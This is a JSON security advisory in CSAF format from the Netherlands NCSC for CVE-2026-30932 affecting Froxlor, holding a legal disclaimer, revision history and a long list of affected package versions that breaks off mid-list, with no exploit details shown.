{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-30932",
        "tracking": {
            "current_release_date": "2026-03-30T14:40:40.624233Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-30932",
            "initial_release_date": "2026-03-24T20:53:25.699041Z",
            "revision_history": [
                {
                    "date": "2026-03-24T20:53:25.699041Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:53:28.024813Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T20:54:07.805019Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Products created (1).| References created (3)."
                },
                {
                    "date": "2026-03-24T20:54:10.984937Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:55:51.160949Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:55:54.718440Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T01:00:08.776815Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T01:00:12.353389Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T14:39:12.214072Z",
                    "number": "9",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-25T14:39:14.044190Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:32:47.790945Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (106).| Product Identifiers created (106).| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T00:54:39.039974Z",
                    "number": "12",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-26T00:54:44.340135Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T12:25:12.480183Z",
                    "number": "14",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-26T12:25:20.228396Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-30T14:40:29.508200Z",
                    "number": "16",
                    "summary": "CVSS created.| References created (1)."
                },
                {
                    "date": "2026-03-30T14:40:31.580288Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "17"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0",
                                "product": {
                                    "name": "vers:unknown/0.10.0",
                                    "product_id": "CSAFPID-533796",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0-rc1",
                                "product": {
                                    "name": "vers:unknown/0.10.0-rc1",
                                    "product_id": "CSAFPID-3452625",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.0-rc2",
                                "product": {
                                    "name": "vers:unknown/0.10.0-rc2",
                                    "product_id": "CSAFPID-3452626",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.0-rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.1",
                                "product": {
                                    "name": "vers:unknown/0.10.1",
                                    "product_id": "CSAFPID-533797",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.10",
                                "product": {
                                    "name": "vers:unknown/0.10.10",
                                    "product_id": "CSAFPID-533786",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.11",
                                "product": {
                                    "name": "vers:unknown/0.10.11",
                                    "product_id": "CSAFPID-533794",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.12",
                                "product": {
                                    "name": "vers:unknown/0.10.12",
                                    "product_id": "CSAFPID-533789",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.13",
                                "product": {
                                    "name": "vers:unknown/0.10.13",
                                    "product_id": "CSAFPID-533787",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.14",
                                "product": {
                                    "name": "vers:unknown/0.10.14",
                                    "product_id": "CSAFPID-533801",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.15",
                                "product": {
                                    "name": "vers:unknown/0.10.15",
                                    "product_id": "CSAFPID-533800",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.16",
                                "product": {
                                    "name": "vers:unknown/0.10.16",
                                    "product_id": "CSAFPID-584149",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.17",
                                "product": {
                                    "name": "vers:unknown/0.10.17",
                                    "product_id": "CSAFPID-586043",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.18",
                                "product": {
                                    "name": "vers:unknown/0.10.18",
                                    "product_id": "CSAFPID-586041",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.19",
                                "product": {
                                    "name": "vers:unknown/0.10.19",
                                    "product_id": "CSAFPID-586039",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.2",
                                "product": {
                                    "name": "vers:unknown/0.10.2",
                                    "product_id": "CSAFPID-533785",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.20",
                                "product": {
                                    "name": "vers:unknown/0.10.20",
                                    "product_id": "CSAFPID-586038",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.20"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.21",
                                "product": {
                                    "name": "vers:unknown/0.10.21",
                                    "product_id": "CSAFPID-586040",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.21"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.22",
                                "product": {
                                    "name": "vers:unknown/0.10.22",
                                    "product_id": "CSAFPID-586042",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.22"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.23",
                                "product": {
                                    "name": "vers:unknown/0.10.23",
                                    "product_id": "CSAFPID-810715",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.23"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.23.1",
                                "product": {
                                    "name": "vers:unknown/0.10.23.1",
                                    "product_id": "CSAFPID-810709",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.23.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.24",
                                "product": {
                                    "name": "vers:unknown/0.10.24",
                                    "product_id": "CSAFPID-810704",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.24"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.25",
                                "product": {
                                    "name": "vers:unknown/0.10.25",
                                    "product_id": "CSAFPID-810719",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.25"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.26",
                                "product": {
                                    "name": "vers:unknown/0.10.26",
                                    "product_id": "CSAFPID-810711",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.26"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.27",
                                "product": {
                                    "name": "vers:unknown/0.10.27",
                                    "product_id": "CSAFPID-810712",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.27"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.28",
                                "product": {
                                    "name": "vers:unknown/0.10.28",
                                    "product_id": "CSAFPID-810714",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.28"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.29",
                                "product": {
                                    "name": "vers:unknown/0.10.29",
                                    "product_id": "CSAFPID-810705",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.29"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.29.1",
                                "product": {
                                    "name": "vers:unknown/0.10.29.1",
                                    "product_id": "CSAFPID-810707",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.29.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.3",
                                "product": {
                                    "name": "vers:unknown/0.10.3",
                                    "product_id": "CSAFPID-533791",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.30",
                                "product": {
                                    "name": "vers:unknown/0.10.30",
                                    "product_id": "CSAFPID-810717",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.30"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.31",
                                "product": {
                                    "name": "vers:unknown/0.10.31",
                                    "product_id": "CSAFPID-810708",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.31"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.32",
                                "product": {
                                    "name": "vers:unknown/0.10.32",
                                    "product_id": "CSAFPID-810716",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.32"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.33",
                                "product": {
                                    "name": "vers:unknown/0.10.33",
                                    "product_id": "CSAFPID-810713",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.33"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.34",
                                "product": {
                                    "name": "vers:unknown/0.10.34",
                                    "product_id": "CSAFPID-810710",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.34"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.34.1",
                                "product": {
                                    "name": "vers:unknown/0.10.34.1",
                                    "product_id": "CSAFPID-810720",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.34.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.35",
                                "product": {
                                    "name": "vers:unknown/0.10.35",
                                    "product_id": "CSAFPID-810718",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.35"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.35.1",
                                "product": {
                                    "name": "vers:unknown/0.10.35.1",
                                    "product_id": "CSAFPID-810706",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.35.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.36",
                                "product": {
                                    "name": "vers:unknown/0.10.36",
                                    "product_id": "CSAFPID-810703",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.36"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.37",
                                "product": {
                                    "name": "vers:unknown/0.10.37",
                                    "product_id": "CSAFPID-810721",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.37"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38",
                                "product": {
                                    "name": "vers:unknown/0.10.38",
                                    "product_id": "CSAFPID-835395",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38.1",
                                "product": {
                                    "name": "vers:unknown/0.10.38.1",
                                    "product_id": "CSAFPID-835393",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38.2",
                                "product": {
                                    "name": "vers:unknown/0.10.38.2",
                                    "product_id": "CSAFPID-835394",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.38.3",
                                "product": {
                                    "name": "vers:unknown/0.10.38.3",
                                    "product_id": "CSAFPID-835396",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.38.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.4",
                                "product": {
                                    "name": "vers:unknown/0.10.4",
                                    "product_id": "CSAFPID-533790",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.5",
                                "product": {
                                    "name": "vers:unknown/0.10.5",
                                    "product_id": "CSAFPID-533788",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.6",
                                "product": {
                                    "name": "vers:unknown/0.10.6",
                                    "product_id": "CSAFPID-533795",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.7",
                                "product": {
                                    "name": "vers:unknown/0.10.7",
                                    "product_id": "CSAFPID-533784",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.8",
                                "product": {
                                    "name": "vers:unknown/0.10.8",
                                    "product_id": "CSAFPID-533792",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.10.9",
                                "product": {
                                    "name": "vers:unknown/0.10.9",
                                    "product_id": "CSAFPID-533799",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@0.10.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.0",
                                "product": {
                                    "name": "vers:unknown/2.0.0",
                                    "product_id": "CSAFPID-876020",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.1",
                                "product": {
                                    "name": "vers:unknown/2.0.1",
                                    "product_id": "CSAFPID-876015",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.10",
                                "product": {
                                    "name": "vers:unknown/2.0.10",
                                    "product_id": "CSAFPID-879533",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.11",
                                "product": {
                                    "name": "vers:unknown/2.0.11",
                                    "product_id": "CSAFPID-882822",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.12",
                                "product": {
                                    "name": "vers:unknown/2.0.12",
                                    "product_id": "CSAFPID-882823",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.13",
                                "product": {
                                    "name": "vers:unknown/2.0.13",
                                    "product_id": "CSAFPID-897815",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.14",
                                "product": {
                                    "name": "vers:unknown/2.0.14",
                                    "product_id": "CSAFPID-945280",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.15",
                                "product": {
                                    "name": "vers:unknown/2.0.15",
                                    "product_id": "CSAFPID-945281",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.16",
                                "product": {
                                    "name": "vers:unknown/2.0.16",
                                    "product_id": "CSAFPID-945282",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.17",
                                "product": {
                                    "name": "vers:unknown/2.0.17",
                                    "product_id": "CSAFPID-945283",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.18",
                                "product": {
                                    "name": "vers:unknown/2.0.18",
                                    "product_id": "CSAFPID-945284",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.19",
                                "product": {
                                    "name": "vers:unknown/2.0.19",
                                    "product_id": "CSAFPID-945285",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.2",
                                "product": {
                                    "name": "vers:unknown/2.0.2",
                                    "product_id": "CSAFPID-876013",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.20",
                                "product": {
                                    "name": "vers:unknown/2.0.20",
                                    "product_id": "CSAFPID-945396",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.20"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.21",
                                "product": {
                                    "name": "vers:unknown/2.0.21",
                                    "product_id": "CSAFPID-945397",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.21"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.22",
                                "product": {
                                    "name": "vers:unknown/2.0.22",
                                    "product_id": "CSAFPID-3765852",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.22"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.23",
                                "product": {
                                    "name": "vers:unknown/2.0.23",
                                    "product_id": "CSAFPID-3765853",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.23"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.24",
                                "product": {
                                    "name": "vers:unknown/2.0.24",
                                    "product_id": "CSAFPID-3765854",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.24"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.3",
                                "product": {
                                    "name": "vers:unknown/2.0.3",
                                    "product_id": "CSAFPID-876017",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.4",
                                "product": {
                                    "name": "vers:unknown/2.0.4",
                                    "product_id": "CSAFPID-876018",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.5",
                                "product": {
                                    "name": "vers:unknown/2.0.5",
                                    "product_id": "CSAFPID-876019",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.6",
                                "product": {
                                    "name": "vers:unknown/2.0.6",
                                    "product_id": "CSAFPID-876016",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.7",
                                "product": {
                                    "name": "vers:unknown/2.0.7",
                                    "product_id": "CSAFPID-876014",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.8",
                                "product": {
                                    "name": "vers:unknown/2.0.8",
                                    "product_id": "CSAFPID-877915",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.0.9",
                                "product": {
                                    "name": "vers:unknown/2.0.9",
                                    "product_id": "CSAFPID-877916",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.0.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0",
                                "product": {
                                    "name": "vers:unknown/2.1.0",
                                    "product_id": "CSAFPID-1015399",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-beta1",
                                "product": {
                                    "name": "vers:unknown/2.1.0-beta1",
                                    "product_id": "CSAFPID-3765855",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-beta1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-beta2",
                                "product": {
                                    "name": "vers:unknown/2.1.0-beta2",
                                    "product_id": "CSAFPID-3765856",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-beta2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-rc1",
                                "product": {
                                    "name": "vers:unknown/2.1.0-rc1",
                                    "product_id": "CSAFPID-3765857",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-rc2",
                                "product": {
                                    "name": "vers:unknown/2.1.0-rc2",
                                    "product_id": "CSAFPID-3765858",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.0-rc3",
                                "product": {
                                    "name": "vers:unknown/2.1.0-rc3",
                                    "product_id": "CSAFPID-3765859",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.0-rc3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.1",
                                "product": {
                                    "name": "vers:unknown/2.1.1",
                                    "product_id": "CSAFPID-1015398",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.2",
                                "product": {
                                    "name": "vers:unknown/2.1.2",
                                    "product_id": "CSAFPID-1095067",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.3",
                                "product": {
                                    "name": "vers:unknown/2.1.3",
                                    "product_id": "CSAFPID-1095068",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.4",
                                "product": {
                                    "name": "vers:unknown/2.1.4",
                                    "product_id": "CSAFPID-1095069",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.5",
                                "product": {
                                    "name": "vers:unknown/2.1.5",
                                    "product_id": "CSAFPID-1095070",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.6",
                                "product": {
                                    "name": "vers:unknown/2.1.6",
                                    "product_id": "CSAFPID-1095071",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.7",
                                "product": {
                                    "name": "vers:unknown/2.1.7",
                                    "product_id": "CSAFPID-1095072",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.8",
                                "product": {
                                    "name": "vers:unknown/2.1.8",
                                    "product_id": "CSAFPID-1095073",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.9",
                                "product": {
                                    "name": "vers:unknown/2.1.9",
                                    "product_id": "CSAFPID-4979442",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.9"
                                    }
